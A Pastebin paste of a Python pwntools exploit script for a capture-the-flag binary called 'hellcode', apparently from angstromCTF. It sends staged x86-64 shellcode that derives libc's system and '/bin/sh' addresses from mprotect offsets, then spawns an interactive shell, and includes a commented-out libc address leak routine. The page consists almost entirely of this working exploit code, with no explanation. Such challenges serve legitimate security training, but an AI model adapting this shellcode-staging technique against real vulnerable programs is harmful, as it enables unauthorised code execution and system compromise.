API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 22nd, 2018
93
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.45 KB | None | 0 0
raw download clone embed print report
  1. from pwn import *
  2.  
  3. import time
  4.  
  5. import sys
  6.  
  7. def hellcode(DEBUG):
  8.  
  9. code_runner = 0x400996
  10.  
  11. offset_mprotect = 0x0000000000101770
  12.  
  13. offset_system = 0x0000000000045390
  14.  
  15. offset_str_bin_sh = 0x18cd57
  16.  
  17.  
  18.  
  19. if DEBUG=="1":
  20.  
  21. t = 0.005
  22.  
  23. r = process("./hellcode")
  24.  
  25. raw_input("debug?")
  26.  
  27. elif DEBUG=="2":
  28.  
  29. s = ssh(host='shell.angstromctf.com', user='teamXXXX', password='XXXXX')
  30.  
  31. r = s.process('/problems/hellcode/hellcode')
  32.  
  33.  
  34.  
  35. def a(s):
  36.  
  37. return asm(s, arch = "amd64", os = 'linux')
  38.  
  39.  
  40.  
  41. def stage1():
  42.  
  43. # save r14 = mprotect+7
  44.  
  45. # r15 = code_runner
  46.  
  47. # return code_runner
  48.  
  49. log.info('stage 1')
  50.  
  51. r.recvuntil("Please enter your code: ")
  52.  
  53. payload = a('pop rbx')
  54.  
  55. payload += a('sub bx, %d' % (0x400B47 - code_runner)) # 0x400996 (code_runner)
  56.  
  57. payload += a('push rcx')
  58.  
  59. payload += a('pop r14') # r14 = mprotect+7
  60.  
  61. payload += a('push rbx')
  62.  
  63. payload += a('push rbx')
  64.  
  65. payload += a('pop r15') # r15 = 0x400996 (code_runner)
  66.  
  67. payload += "\x90"*(0x10-len(payload))
  68.  
  69. r.send(payload)
  70.  
  71.  
  72.  
  73. def stage2():
  74.  
  75. # change r14 from mprotect+7 to system
  76.  
  77. # r13 = system
  78.  
  79. # return code_runner
  80.  
  81. log.info('stage 2')
  82.  
  83. r.recvuntil("Please enter your code: ")
  84.  
  85. payload = a('pop rax') # trash
  86.  
  87. payload += a('push r15') # code_runner
  88.  
  89. payload += a('sub r14, %d' % (offset_mprotect+7 - offset_system)) # r14 = system
  90.  
  91. payload += a('push r14')
  92.  
  93. payload += a('pop r13') # r13 = system
  94.  
  95. payload += "\x90"*(0x10-len(payload))
  96.  
  97. r.send(payload)
  98.  
  99.  
  100.  
  101. def stage3():
  102.  
  103. # change r13 to /bin/sh
  104.  
  105. # return system (r14)
  106.  
  107. log.info('stage 3')
  108.  
  109. r.recvuntil("Please enter your code: ")
  110.  
  111. payload = ''
  112.  
  113. payload += a('add r13, %d' % (offset_str_bin_sh - offset_system)) # r13 = /bin/sh
  114.  
  115. payload += a('push r13')
  116.  
  117. payload += a('pop rdi') # rdi = /bin/sh
  118.  
  119. payload += a('push r14') # system
  120.  
  121. payload += "\x90"*(0x10-len(payload))
  122.  
  123. r.send(payload)
  124.  
  125.  
  126.  
  127. def leak():
  128.  
  129. puts_plt = 0x4007A0
  130.  
  131. libc_start_main_got = 0x602048
  132.  
  133. r.recvuntil("Please enter your code: ")
  134.  
  135. payload = a('pop rbx')
  136.  
  137. payload += a('sub bx, 0xd9')
  138.  
  139. payload += a('push rbx')
  140.  
  141. payload += a('mov rdi, 0x602048')
  142.  
  143. payload += "\x90"*(0x10-len(payload))
  144.  
  145. r.send(payload)
  146.  
  147. res = r.recv(6)
  148.  
  149. print hex(u64(res.ljust(8,"\x00"))) # same local
  150.  
  151.  
  152.  
  153.  
  154.  
  155. stage1()
  156.  
  157. stage2()
  158.  
  159. stage3()
  160.  
  161. # leak()
  162.  
  163.  
  164.  
  165. r.interactive()
  166.  
  167.  
  168.  
  169. hellcode(sys.argv[1])
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!